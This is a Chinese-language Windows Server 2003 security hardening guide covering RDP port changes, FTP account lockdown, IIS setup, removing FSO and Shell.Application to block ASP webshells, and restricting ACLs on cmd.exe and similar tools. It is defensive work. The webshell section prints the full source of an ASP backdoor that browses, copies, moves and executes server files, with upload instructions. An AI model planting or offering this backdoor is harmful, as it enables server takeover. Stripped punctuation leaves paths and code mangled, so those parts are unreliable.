Win2003服务器组网、安全管理全攻略.doc

win2003服务器组网、安全管理全攻略win2003服务器组网、安全管理全攻略(2)3389终端服务器的安全配置： 在本文第二节中，我们已经介绍了在windows组件向导里安装3389终端服务器的方法，我们只须在windows组件向导里勾选终端服务就可以使用终端服务远程管理服务器了。相信大家都玩过了3389的肉鸡，网络上大部份被黑客入侵的空口令肉鸡因为开放了3389终端远程管理服务，而被黑客不费吹灰之力就能取得远程管理权。因为黑客们都是使用如 x-scan 等漏洞扫描软件，只要黑客扫描3389端口的机器，你的终端服务器就会暴露在黑客的眼前，那就对你的服务器存在一定的危险性。3389终端远程管理服务默认的情况下是开放3389端口的，只要我们终端服务默认开放的端口号改一下，那么黑客就很难猜测我们的服务器是否开放终端服务了。修改终端服务器端口号是通过修改windows2003的注册表来实现的，我们只要修改注册表中的其中一项键值即可。点击“开始菜单运行”在运行里输入 regedit 命令，启动注册表编辑器，然后打开如下键值： hkey_local_machinesystemcurrentcontrolsetcontrolterminal serverwinstationsrdp-tcp 找到如下键名 portnumber ，双击打开修改键值，然后选择“十进制(d)”，将原来的3389端口号改为你想更换的端口号，本例中我们把端口改为7890，如下图（图12）所示：在端口号修改完毕后，我们重新启动计算机使修改的端口号生效，这样别人就没法使用3389端口连接你的服务器了，重启完成后，我们以后如想连接终端服务器，可打开终端服务客户端软件，然后在计算机(c)的右栏中输入你服务器的ip地址及端口号即可登陆你的终端服务器，假设我们的服务器ip地址为 ，那么我们只要在输入框中输入如下地址即可登陆终端服务器“:7890 ”其中ip与端口号用“:”分隔开。如下图（图13）所示：（图13）当登陆成功后，会出现以下成功登陆窗口，如图（图14）所示：14）（图 至此终端服务器端口修改成功。8、用ie远程管理服务器：黑防在上期杂志上刊登了win2003的web安全远程管理一文，以下作一些补充，详细安装远程web管理过程及基本功能请看上期黑防杂志win2003的web安全远程管理。在这里我们需要补充的是基于web管理中的终端服务，就是说我们可以通过任何一台客户机的ie浏览器直接进行远程桌面连接，而不再依赖任何的终端服务客户端工具登陆win2003的终端服务了。现在假设我们客户机使用的是win98系统，服务器的ip地址这 ，我们可在ie地址栏中输入地址：“ :8089 ”，其中8089是远程管理的 web 界面下的ssl端口，然后输入管理员的用户名和密码并回车即可登陆web远程管理界面。在打开的“服务管理”界面中，点击“维护”再点击“远程桌面”按钮，就会弹出一个远程桌面管理维护的终端窗口，现在就可以连接到远程服务器的桌面了。在该窗口中，你只要输入管理员的用户名及密码，就能成功登陆远程桌面，就像你登陆3389终端服务一样。如上图（图14）所示。无论是3389终端服务还是web远程桌面管理，都是只能允许同时两个连接会话，如果已经有两个以上会话在进行，则新用户将被拒绝进行远程桌面管理登陆。必须要等正在登陆的原来两个用户其中一个退出登陆会话后，你才能登陆服务器远程桌面进行管理。9、ftp服务器配置：在本文第二节中，我们已经介绍了在windows组件向导里安装ftp服务器的方法，现在我们开始使用win2003系统自带的ftp服务架设一台安全的ftp服务器。步骤1、为ftp服务器建立一个安全的专用ftp帐号：点击“开始菜单管理工具计算机管理”，这里弹出一个计算机管理窗口，我们在里面建立一个供ftp客户端登陆的帐号，双击左栏中的“本地用户和组”然后在右栏中点击鼠标右键，选择“新建”命令，就会弹出一个新用户建立窗口，现在我们建立一个用户，在这里我们建立一个用户名为 cnhack 的帐号，密码为chinanetpk ，并去除“用户下次登陆时须更改密码”的选项，勾选“用户不能更改密码”及“密码永不过期”选项。然后点击“创建”按钮，就创建了一个用户名为 cnhack 的用户。如下图（图15）所示：1 5）（图为了服务器安装着想，我们还须进行如下安全设置，在默认的情况下，我们建立的用户帐号为 users 组用户，虽然普通用户组对服务器安全影响不大，但我们还是把这个用户所属的 users 组删除，把刚建立的 cnhack 用户添加到 guests 用户组，步骤如下：右击右栏中刚才建立的普通用户 cnhack ，出现一个菜单，选择属性，这时会弹出别一个窗口cnhack 属性窗口，选择“隶属于”标签，这时我们会看到cnhack 用户隶属于users组，我们选择下栏中的users组名称，并选择“删除”按钮，这里cnhack用户原来的隶属组被删除，我们再点击下栏中的“添加”按钮，这时弹出一个“选择组”窗口，选择“高级”按钮，再点击“立即查找”按钮，这时我们会看到一个“guests”用户组名，双击“guests”用户组名称后返回选择组窗口，点击“确定”按钮退出。这样我们就把刚建立的 cnhack 用户添加进了guests 用户组，并把原 cnhack 隶属的用户组删除了。基本配置方法如下图（图16）所示：16）（图为了服务器安装着想，我们还应在“cnhack属性”栏里选择远程控制标签，把“启用远程控制”的勾去掉。这里一个安全的ftp帐号建立成功。如下图（图17）所示：17）（图本例中，我们在d盘建立一个文件夹，并重命名该文件夹文件名为 cnhack ，然后在该文件夹图标处点击右键，出现一菜单，选择“属性”，这里弹出一个属性对话框，在“ cnhack 属性”中选择“安全”标签，点击右下方的“高级”选项，并去除勾选“允许父项的继承权限传播到该对像和所有对像，包括那些在此明确定定义的项目(a)”。如下图（图18）所示：18）（图然后点击确定按钮，返回cnhack属性的“安全”标签，在这里会看到还剩下一个超级管理员组 administrators 成员可以管理cnhack 文件夹，我们再勾选允许超级管理员组成员允许完全控制该文件夹，这样就给了我们管理员组对cnhack文件夹的完全控制权，现在我们再给我们刚才建立的 cnhack 用户管理权限，我们点击”添加”按钮，根据提示把 cnhack 帐号添加成为 cnhack 文件夹的管理员，然后再勾选允许cnhack 帐号完全管理该文件夹，这样就给了 cnhack 帐号对该文件夹的完全管理权。如下图（图19所示）：19）（图现在d:cnhack 文件夹只允许超级管理员组administrators 成员和帐号为 cnhack 的来宾组成员进行管理与访问了，其它帐户的帐号将不能对 cnhack 文件夹有任何的访问权及修改权限。步骤2、使用internet 信息服务(iis)管理器建立一个安全的ftp空间：现在我们打开“开始菜单”“程序”“管理工具”“internet 信息服务(iis)管理器”，弹出一个iis管理器窗口，在里面找到“ftp站点” “默认 ftp 站点”，并在“默认 ftp 站点”里点击鼠标右键，选择“属性”选择，出现一个“默认 ftp 站点属性”对话框，选择“主目录”标签，把原来默认的地址改为我们刚才建立的文件夹d:cnhack 的路径，下面会有三个选项，分别是、“读取、写入、记录访问”，你可以根据需要勾选，如果中介提供给别人下载的ftp空间，则不要勾选写入选项，如果需要提供给别人上传及更改ftp空间内容的，则需要勾选写入选项。本例中，我们是让朋友可以把数据上传到ftp空间的，所以我们勾选了“写入”选项，如下图（图20）所示：20）（图下面我们再来配置使用指定的我们刚才建立的帐号cnhack 才能登陆现在这个ftp空间，我们现在点击“安全帐户”标签，再点击“浏览”按钮，根据提示选择我们刚才建立的cnhack用户名，然后点击确定，这样就指定了这个空间只有使用我们设置的 cnhack 用户帐号才能登陆，记住不要勾选下面的“只允许匿名连接”选项，因为这样将会带来安全问题，如下图（图21）所示：21）（图现在我们再来指定该ftp站点的ip地址，我们只要点击“ftp站点”标签，然后在“ip地址（i）”的右栏输入框里输入我们本机的ip地址即可。还有可以在“tcp/ip端口（t）”的右输入框里修改当前ftp站点的tcp/ip端口号，默认情况下是使用21端口的。如下图（图22）所示：22）（图这样一个安全的ftp站点就建立成功了。使用iis6建立的ftp服务器可以使用ie及ftp客户端软件登陆ftp空间。而且功能强大。10、iis6下防范webshell安全配置：前几节中，我们已经介绍过了如何在iis6下配置cgi、php，在win2003系统下，asp和aspx都是系统组件，都可以在“开始菜单” “控制面版”“添加删除程序”里安装及删除的。关于安装及配置上述组件的方法在这里不再详述。（1）配置一个简单的www虚拟主机：现在我们举例如何组建一个www的虚拟主机网站，我们现在打开“internet 信息服务(iis)管理器”，在左栏窗口中双击“网站”会展开一个关联菜单，找到“默认网站”点击右键出现一个菜单，选择菜单里的“属性”选项，弹出一个“默认网站属性”窗口，现在我们选择“网站”标签，在“ip地址（i）”的右栏里输入你机器的ip地址，本例中，我们的ip地址输入为 ，这个ip地址就是我本机的ip地址，在“tcp端口（t）”里我们可以看到默认的浏览窗口是80，在这里我们可以更改浏览网站的端口号，点击右栏的“高级（d）”按钮，我们可以在里面添加或删除我们网站的浏览域名，当然这个域名是你在internet上申请来的，并把域名的a记录指向到了你的本机ip，以后我们就可以使用域名记录来访问你的网站了。现在我们来配置这个虚拟主机的www访问目录，我们点击“主目录”标签，在“本地路径（c）”的右栏里输入你这个虚拟主机在www所要浏览的目录，在本例中，我们输入d:cnhack ，这样明人就能在www上通过 http 协议访问我们服务器里的 d:cnhack 目录里的资源了。在“本地路径（c）”的下方有多个可勾选的选项，一般我们保留默认的就行了，千万不要勾选“写入”项，因为这样将会导致服务器的安全问题，一般我们只使用默认的“读取（r）、记录访问（v）、索引资源（i）”就已经足够了。如下图（图23）所示：23）（图我们还可以在“文档”标签里添加虚拟主机默认的首页文件名等，这样一个简单的虚拟主机服务就配置完成了。如果你已经按上几节所写的配置过成，那么现在你的这个虚拟主机将会是已经支持asp、aspx、cgi、php、fso、jmail、mysql、smtp、pop3、ftp、3389终端服务、远程桌面web连接管理服务等功能强大的服务器了。（2）、安全使用fso主机：其实按我们上一节所说的配置一个简单的虚拟主机，这样的主机是存在各种webshell的威胁的，假如你给朋友开了个虚拟主机空间，那么这个虚拟主机存在的最大安全隐患将会是fso权限问题，其实fso的安全隐患在win2k系统里已经是令网管头疼的事了，但在win2003中这个fso的安全隐患却依然没有解决，在没有经过安全配置的虚拟主机下，只要黑客给虚拟主机空间上传一个asp木马，黑客就能利用fso权限浏览服务器里的所有文件，并能复制、删除服务器里的所有文件，甚至能利用asp木马取得服务器的管理权，可见fso安全配置的重要性。下面我们举例，如果黑客通过某些手段在你的虚拟主机空间上传了一个asp木马，那么就等于黑客已经拥有了一个webshell，黑客可以通过这个webshell控制整台服务器里的数据，本例中我们介绍的是黑客们都熟悉的海阳顶端asp木马，这种webshell能通过网页在线更改、编辑、删除、移动、上传、下载服务器上的任意文件，只要黑客给你的服务器传上这个asp木马，你的服务器上的所有文件就会控制在黑客的手上，黑客能在你的服务器干什么？就是上面提及到的。更改、删除、移动如下图（图24）所示：24）（图看到这个图，你也能想像到你的服务器到最后会变得怎么样了，你服务器上的资料将没有隐私可言了，想黑你服务器上的主页或是删除你服务器上的文件都是点几下鼠标就能办到的了。这种asp木马网络上各黑客网站均有下载，源代码就不便写出来了。各黑客网站上还有其它版本的asp木马下载，但基本上都是调用fso（scripting.filesystemobject）写的。其实你如果要防范这种攻击，你只要把asp中的fso（scripting.filesystemobject）功能删除就行了，删除fso权限方法就是在cmd的命令提示符下输入以下命令：regsvr32 /u c:windowssystem32scrrun.dll注意：在实际操作的时候要更改成为你本地系统安装目录的实际路径，但是使用这种方法删除也太绝了一点，如果以后我们想使用fso权限，那就用不了啦。所以建议不要使用这种方法删除fso权限，显而易见，如果这样做，那么包括站点系统管理员在内的任何人都将不可以使用filesystemobject对象了，这其实并不是站点管理人员想要得到的结果，毕竟我们使用这个对象可以实现方便的在线站台管理，如果连系统管理员都没法使用了，那可就得不偿失了，但是不禁止这个危险的对象又会给自己的站点带来安全漏洞。那么有没有两全其美的方法呢？有！具体方法如下： 我们可以做到禁止其他人非法使用filesystemobject对象,但是我们自己仍然可以使用这个对象。方法如下：查找注册表中 hkey_classes_rootscripting.filesystemobject 键值 将其更改成为你想要的字符串(右键-重命名),比如更改成为 hkey_classes_rootscripting.filesystemobject2 这样,在asp就必须这样引用这个对象了: set fso = createobject(scripting.filesystemobjectnetpk) 而不能使用: set fso = createobject(scripting.filesystemobject) 如果你使用通常的方法来调用filesystemobject对象就会无法使用了。 呵呵，只要你不告诉别人这个更改过的对象名称，其他人是无法使用filesystemobject对象的。这样，作为站点管理者我们就杜绝了他人非法使用filesystemobject对象，而我们自己仍然可以使用这个对象来方便的实现网站在线管理等等功能了！(3)免fso对像就能使用的asp木马防范方法：对于这种免fso对像就能使用的asp木马，由于少了fso对像的支持，功能上当然不会很强大的了，只有浏览服务器上的文件目录，复制、移动文件、执行指定路径的程序文件等功能。以下是当你浏览这个asp木马时，所出现的图例，如(图25)所示：25）（图你可以通过这个免fso支持的asp木马对服务器上的文件进行任意的复制及移动和执行程序，这个木马程的功能随然简单，但是用它来黑一个网站就是已经足够的了。比如，我们可以把网站的首页移动到其它地方，然后我们再复制一个同名的黑客网页进去就行了。使用执行程序功能让服务器执行任意的木马程序以取得服务器的admin管理权等。 以下我给出这个免fso对像的asp源代码，代码如下：%response.write 一次只能执行一个操作:) % 程序所在的物理路径： asps shell.application backdoor form action= method=post input type=text name=text value= 输入要浏览的目录 input type=text name=text1 value= copy input type=text name=text2 value= input type=text name=text3 value= move input type=text name=text4 value= 路径：input type=text name=text5 value= 程序：input type=text name=text6 value= % szcmd = request.form(text) 目录浏览 if (szcmd ) then set shell=server.createobject(shell.application) 建立shell对象 set fod1=space(szcmd) set foditems=fod1.items for each co in foditems response.write & co.path & - & co.size & next end if % % szcmd1 = request.form(text1) 目录拷贝，不能进行文件拷贝 szcmd2 = request.form(text2) if szcmd1 and szcmd2 then set shell1=server.createobject(shell.application) 建立shell对象 set fod1=space(szcmd2) for i=len(szcmd1) to 1 step -1 if mid(szcmd1,i,1)= then path=left(szcmd1,i-1) exit for end if next if len(path)=2 then path=path & path2=right(szcmd1,len(szcmd1)-i) set fod2=space(path) set foditem=fod2.parsename(path2) fod1.copyhere foditem response.write command completed success! end if % % szcmd3 = request.form(text3) 目录移动 szcmd4 = request.form(text4) if szcmd3 and szcmd4 then set shell2=server.createobject(shell.application) 建立shell对象 set fod1=space(szcmd4) for i=len(szcmd3) to 1 step -1 if mid(szcmd3,i,1)= then path=left(szcmd3,i-1) exit for end if next if len(path)=2 then path=path & path2=right(szcmd3,len(szcmd3)-i) set fod2=space(path) set foditem=fod2.parsename(path2) fod1.movehere foditem response.write command completed success! end if % % szcmd5 = request.form(text5) 执行程序要指定路径 szcmd6 = request.form(text6) if szcmd5 and szcmd6 then set shell3=server.createobject(shell.application) 建立shell对象 space(szcmd5).items.item(szcmd6).invokeverb response.write command completed success! end if % 你只要把上面的代码写在记事本里，保存扩展名为 .asp ，再传到你的虚拟主机空间就可以运行了。防范免fso支持的asp木马方法如下：通过上面的代码，我们可以看出这段代码的shell是通过shell.application 建立 shell 对像的，我们只要在注册表里查找键值shell.application和 wscript.shell 键值，然后把这些键值删除，就能防止这一类的asp木马攻击了，删除这些键值对你的服务器及asp支持等不会造成影响的，所以请放心删除。各黑客网站上还有各种各样的webshell下载，除了asp的webshell以外，还有cgi、php、jsp的等等。基本上都是大同小异的，还有一些webshell是调用系统下的cmd.exe命令运行的。但这些调用服务器系统cmd.exe的webshell木马在win2003下没法运行了，能调用cmd.exe命令的webshell只在win2k下测试通过，在win2003下，那些asp、cgi、php、jsp的webshell已经不能调用cmd.exe的命令了。原因很简单，因为win2k下的cmd.exe命令在默认情况下是能以匿名及来宾权限访问的，而win2003系统下，cmd.exe命令却禁止了“everyone”匿名访问及“guests”组的访问权限了，所以各种调用cmd.exe的webshell木马都没法运行了，这也算是win2003系统安全上的一点进步吧。十一、配置一台安全的服务器，把各种溢出攻击、反向连接木马拒于门外：上一节中，我们谈到了有些webshell能通过调用系统的cmd.exe命令在服务器上运行cmd命令，我们再细想一下，现在网络上流行的溢出攻击，如webdav溢出等不就是对存有溢出漏洞的服务器进行溢出攻击的吗？攻击成功后，被溢出的服务器就会自动绑定服务器的cmd.exe命令，黑客就会远程连接被溢出成功的服务器的cmd.exe命令行。以取得远程服务器的系统管理权。既然黑客的溢出攻击是通过溢出攻击工具溢出成功后绑定cmd.exe命令并以system系统权限登陆服务器的，只要我们对win2003系统下的c:windowssystem32cmd.exe文件设置一定的权限，呵呵，那么黑客的这些溢出攻击都将没用武之地了。为了安全起见，我们还要对如 net.exe cacls.exe telnet.exe tftp.exe ftp.exe mountvol.exe mshta.exe等危险的命令作出权限设置。因为这些危险的文件默认的情况下都是允许system权限的用户访问及执行的，只有为这些文件设置了权限，这样才能确保服务器系统真正的安全。这些危险的文件默认的情况下，都是存放在 c:windowssystem32 的目录下的。设置权限的方法如下图（图26）所示：(图26)清除原来的所有其它用户访问这些命令的权限，然后只设置允许你正在使用的超级用户拥有使用这些命令的权限，比如说你正在使用的超级用户名是 administrator 那么，你就在权限设置里只允许用户名为 administrator 的用户使用这些命令。通过这些安全配置，以后你的服务器就算存在溢出漏洞，就算黑客对你的服务器进行溢出攻击成功，黑客也没法登陆你的服务器的了，因为一般黑客的溢出攻击都是通过绑定远程被溢出攻击服务器的系统cmd命令登陆的，并且是以system权限登陆，而你在cmd的使用权限里删除了所有用户的使用cmd权限，只有你正在使用的超级管理员帐号才能拥有这个cmd命令的使用权，所以黑客就算溢出成功了，也没法远程连接并登陆你的服务器了。通过最简单的安全配置，就能防范多种未知及已知的溢出攻击，是不是很实用呢！：）但这只能是相对的安全，因为有些溢出攻击黑客能直接把反向连接的木马文件传到你的服务器上，并能运行哦。呵呵，如最近出现的serv-u溢出，如果你的ftp服务器使用了serv-u的话，你又没有打上最新的安全补丁，让黑客溢出成功了，那么黑客可以不绑定你的cmd命令登陆你的服务器，而是给你服务器传一个反向连接的木马后门，这